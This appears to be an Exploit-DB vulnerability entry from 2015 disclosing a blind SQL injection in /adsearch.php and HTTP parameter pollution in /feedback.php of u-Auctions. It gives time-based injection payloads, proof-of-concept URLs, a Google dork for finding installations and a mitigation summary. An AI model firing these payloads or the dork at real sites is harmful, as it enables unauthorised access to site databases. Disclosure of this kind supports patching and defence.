u-Auctions Multiple Vulnerabilities

vendor:

by:

Don (Balcan Crew)

5.5

CVSS

MEDIUM

Blind SQL injection, HTTP parameter pollution

CWE

Product Name:

Affected Version From: ALL

Affected Version To: ALL

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Debian

2015

u-Auctions Multiple Vulnerabilities

This exploit includes multiple vulnerabilities in the u-Auctions system. The first vulnerability is a blind SQL injection in /adsearch.php, where the 'category' input is vulnerable. The second vulnerability is an HTTP parameter pollution in /feedback.php, where the 'id' parameter is affected. These vulnerabilities can be exploited to override parameters, modify application behavior, access uncontrollable variables, and bypass input validation checkpoints and WAF rules.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user inputs, use prepared statements or parameterized queries to prevent SQL injection, and implement proper input validation and parameter handling to prevent HTTP parameter pollution.

Source

Exploit-DB raw data:

# Exploit Title: *u-Auctions Multiple Vulnerabilities*
# Google Dork: "*Powered by u-Auctions** ©*"
# Date: *03 April 2015*
# Exploit Author: *Don*
# Vendor Homepage: https://www.*u-auctions.com <http://u-auctions.com>*/
# Version: *ALL*
# Tested on: *Debian*

*1. Blind SQL injection*:

This vulnerability affects */adsearch.php*
URL encoded POST input *category* was set to
*(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/*

*POC:*

*http://www <http://www>.targetsite.com
<http://targetsite.com>/adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y&country=Afghanistan&csrftoken=59b61458fbbb4d6d44a4880717a3350a&desc=y&ending=1&go=GO%20%3E%3E&maxprice=1&minprice=1&payment%5b%5d=paypal&seller=1&SortProperty=ends&title=Mr.&type=2&zipcode=94102*

*Done*
*+-------------------------------------------------------------------------------------------------------------------------------------+*
*2. HTTP parameter pollution*
This vulnerability affects /*feedback.php*

URL encoded GET input *id* was set to *1&n903553=v972172*
Parameter precedence: *last occurrence*
Affected parameter: *user_id=1*

The impact depends on the affected web application.
*An attacker could*:
*1* = Override existing hardcoded HTTP parameters
*2* = Modify the application behaviors
*3* = Access and, potentially exploit, uncontrollable variables
*4* = Bypass input validation checkpoints and WAFs rules

POC:

*http://www <http://www>.targetsite.com
<http://targetsite.com>/feedback.php?faction=show&id=1%26n903553%3dv972172*
*Done*
*+-------------------------------------------------------------------------------------------------------------------------------------+*
*There is XSS too but I don't see it useful for anything, so will skip it.*
*Cheers folks, Don (Balcan Crew) is back! :)*
*Have fun and have friends!*
*Shouts to my good friends from past / whoever is online / this website and
new kids from the localhost.*
*~Don 2015*